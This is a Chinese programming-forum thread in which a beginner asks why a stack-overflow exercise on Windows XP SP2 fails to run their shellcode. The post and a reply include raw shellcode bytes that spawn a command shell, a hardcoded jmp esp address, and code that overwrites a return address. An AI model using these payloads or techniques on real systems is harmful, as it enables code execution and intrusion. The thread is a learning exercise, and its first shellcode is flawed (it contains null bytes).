关于溢出执行代码失败的问题

hhero0773 2008-11-21 06:30:24
小弟刚学溢出不久,遇到一个问题:溢出后没有按照我的想法执行我的代码。请高手指点指点!!!我的代码如下:

一、获得需要执行的程序的机器码

    #include"stdafx.h"

    #include<windows.h>



    int main()

    {

	LoadLibrary("msvcrt.dll");

	system("command.com");

	return 0;

    }

    获得机器码:"\x55\x8B\xEC\x83\xEC\x40\x53\x56\x57\x8D\x7D\xC0\xB9\x10\x00\x00\x00"

	       "\xB8\xCC\xCC\xCC\xCC\xF3\xAB\x8B\xF4\x68\x2C\x20\x42\x00\xFF\x15\x5C\x71\x42\x00"

	       "\x3B\xF4\xE8\x54\x01\x00\x00\x68\x1C\x20\x42\x00\xE8\x3A\x00\x00\x00"

	       "\x83\xC4\x04\x33\xC0"



二、溢出测试程序

    #include"stdafx.h"

    #include<stdio.h> 

    #include<string.h>



    char name[] = "\x41\x41\x41\x41"  //AAAA

		  "\x41\x41\x41\x41"  //AAAA

		  "\x41\x41\x41\x41"  //AAAA



		  "\x7f\xfa\x45\x12"  //jmp esp(问题是不是在这个地方,我的系统是WindowsXP SP2)



                  //程序一的机器码

		  "\x55\x8B\xEC\x83\xEC\x40\x53\x56\x57\x8D\x7D\xC0\xB9\x10\x00\x00\x00"

		  "\xB8\xCC\xCC\xCC\xCC\xF3\xAB\x8B\xF4\x68\x2C\x20\x42\x00\xFF\x15\x5C\x71\x42\x00"

		  "\x3B\xF4\xE8\x54\x01\x00\x00\x68\x1C\x20\x42\x00\xE8\x3A\x00\x00\x00"

		  "\x83\xC4\x04\x33\xC0";  



 

    int main() 

    { 

	char output[8]; 

	strcpy(output, name);  //测试溢出



	return 0; 

    }
...全文
57 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
sophy520eangel 2009-03-01
  • 打赏
  • 举报
 回复
同时顶下#4

少用strcpy()
sophy520eangel 2009-03-01
  • 打赏
  • 举报
 回复
或许LZ可以用下下面这段代码来测试下.....
#include "stdio.h"
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC6\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
再见品月 2009-02-18
  • 打赏
  • 举报
 回复
嘻嘻。看不懂。。建议去C/C++区问
supercow 2009-02-18
  • 打赏
  • 举报
 回复
难道你不知道字符串会被 \x00 截断么?

strcpy 换 memcpy 去试试. <-- 当然你实战的时候 不能这样...
John_Yang 2008-12-14
  • 打赏
  • 举报
 回复
Mark一下,现在忙,回头若楼主还没解决,再来帮忙。
derek02 2008-11-22
  • 打赏
  • 举报
 回复
up...
ssk148150105 2008-11-22
  • 打赏
  • 举报
 回复
mark
单行文本与多行文本溢出时显示省略号的CSS设置
单行文本与多行文本溢出时显示省略号的CSS设置
解决 SqlServer执行脚本,文件过大,内存溢出问题
解决 SqlServer执行脚本,SQL文件太大,内存溢出问题,直接编辑文件复制粘贴形式没有任何反应; 执行.sql脚本文件,如果文件较大时,执行会出现内存溢出问题,可用命令替代 cmd 中输入 osql -S127.0.0.1,1433 -U sa -P sa -i d:\pfcms.sql ,-S 服务器名 -U 用户名 -P 密码 -i 文件地址,等待执行完毕即可 1433为端口号 d...
溢出漏洞及栈溢出攻击
1. 栈溢出的原因 栈溢出(stack-based buffer overflows)算是安全界常见的漏洞。一方面因为程序员的疏忽,使用了 strcpy、sprintf 等不安全的函数,增加了栈溢出漏洞的可能。另一方面,因为栈上保存了函数的返回地址等信息,因此如果攻击者能任意覆盖栈上的数据,通常情况下就意味着他能修改程序的执行流程,从而造成更大的破坏。这种攻击方法就是栈溢出攻击(stack
溢出问题:数组溢出,整数溢出,缓冲区溢出,栈溢出,指针溢出
在C/C++程序里有一类非常典型的问题,那就是:溢出问题。一般在笔试题里,这类问题会以程序改错或者安全问题出现。现在分别来分析一下常见的数组溢出,整数溢出,缓冲区溢出,栈溢出和指针溢出等。 (1)数组溢出 在C语言中,数组的元素下标是从0开始计算的,所以,对于n个元素的数组a[n], 遍历它的时候是a[0],a[1],...,a[n-1],如果遍历到a[n],数组就溢出了。void pr...
C语言常见漏洞-缓冲区溢出
缓冲区溢出1.原理2.攻击方式2.1 利用shellcode2.2 跳到其它函数2.3 其它情况3.防护3.1 canary(栈保护)3.2 NX3.3 RELRO3.4 PIE 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上。 理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。 缓冲区溢出有堆缓冲区和栈缓冲区溢出,二者有些不同,大部分情况下都是讨论栈溢出。 1
安全技术/病毒

9,506

社区成员

28,984

社区内容

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章